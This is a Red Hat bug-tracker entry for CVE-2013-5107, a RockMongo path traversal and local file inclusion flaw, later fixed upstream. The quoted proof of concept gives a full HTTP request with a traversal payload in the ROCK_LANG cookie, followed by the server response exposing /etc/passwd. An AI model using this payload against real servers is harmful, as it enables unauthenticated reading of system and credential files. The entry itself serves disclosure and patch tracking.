Bug 1043654 (CVE-2013-5107) - CVE-2013-5107 RockMongo: directory traversal vulnerability
Summary: CVE-2013-5107 RockMongo: directory traversal vulnerability
Status: CLOSED WONTFIX
Alias: CVE-2013-5107
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=low,public=20130816,reported=2...
Keywords: Security
Depends On: 1043673
Blocks: 1043672
TreeView+ depends on / blocked
 
Reported: 2013-12-16 20:31 UTC by Kurt Seifried
Modified: 2019-06-08 19:50 UTC (History)
6 users (show)

(edit)
Clone Of:
(edit)
Last Closed: 2014-09-07 05:03:20 UTC


Attachments (Terms of Use)

Description Kurt Seifried 2013-12-16 20:31:45 UTC
Damian Profancik of Trustwave SpiderLabs reports:

RockMongo is vulnerable to a Local File Include and Path Traversal
Vulnerability. Specifically, modifying the the ROCK_LANG cookie.

This vulnerability does not require an attacker to be authenticated prior
to performing the exploit. This is because the ROCK_LANG cookie is
processed and included prior to logging in to the application. Below is a
proof of concept for exploiting this vulnerability:

Example 1 (Tested on RockMongo v1.1.2):

#Request

GET /index.php?action=login.index&host=0 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ROCK_LANG=../../../../etc/passwd%00
Connection: keep-alive


#Response

HTTP/1.1 200 OK
Date: Mon, 10 Jun 2013 13:32:57 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.9
Set-Cookie: PHPSESSID=mla2qlmqa810h07qn6bie8qk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4897
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>RockMongo</title>
<script language="javascript" src="js/jquery-1.4.2.min.js"></script>
<script language="javascript" src="js/jquery.textarea.js"></script>
<link rel="stylesheet" href="themes/default/css/global.css" type="text/css" media="all"/>
<script language="javascript">
$(function () {
$(document).click(window.parent.hideMenus);
if ($("textarea").length > 0) {
$("textarea").tabby();
}
});
</script>
</head>
<body>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:105:65534::/var/lib/nfs:/bin/false
postfix:x:106:114::/var/spool/postfix:/bin/false
ntop:x:107:116::/var/lib/ntop:/bin/false
mongodb:x:108:65534::/home/mongodb:/bin/false
mysql:x:109:118:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:110:119::/home/ntp:/bin/false
+::::::
<script type="text/javascript">
var showMore = 0;
...

External references:
https://www.trustwave.com/spiderlabs/advisories/TWSL2013-026.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5107

Comment 2 Kurt Seifried 2014-07-04 07:08:39 UTC
This was fixed upstream:

http://rockmongo.com/wiki/changeLog

v1.1.6 - 2014-06-05

Fixed cookie vulnerability as reported in CVE-2013-5107 (thanks for synthomat)

Comment 3 Kurt Seifried 2014-11-30 19:51:38 UTC
Statement:

This issue affects the versions of the mongo cartridge as shipped with Red Hat OpenShift Enterprise Linux 2. Red Hat Product Security has rated this issue as having Low security impact. A future update may address this issue. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/. Additionally OpenShift uses a strong file permission and SELinux permission model minimizing the amount of data that can be viewed.


Note You need to log in before you can comment on or make changes to this bug.